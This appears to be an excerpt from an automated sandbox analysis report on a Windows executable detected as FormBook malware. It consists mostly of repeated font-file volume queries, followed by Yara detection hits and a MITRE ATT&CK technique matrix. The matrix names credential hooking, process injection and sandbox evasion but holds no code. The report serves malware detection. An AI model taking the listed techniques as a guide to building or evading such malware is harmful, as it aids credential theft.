Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection712	Rootkit1	Credential API Hooking1	Query Registry1	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Masquerading1	LSASS Memory	Security Software Discovery331	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion41	NTDS	Virtualization/Sandbox Evasion41	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
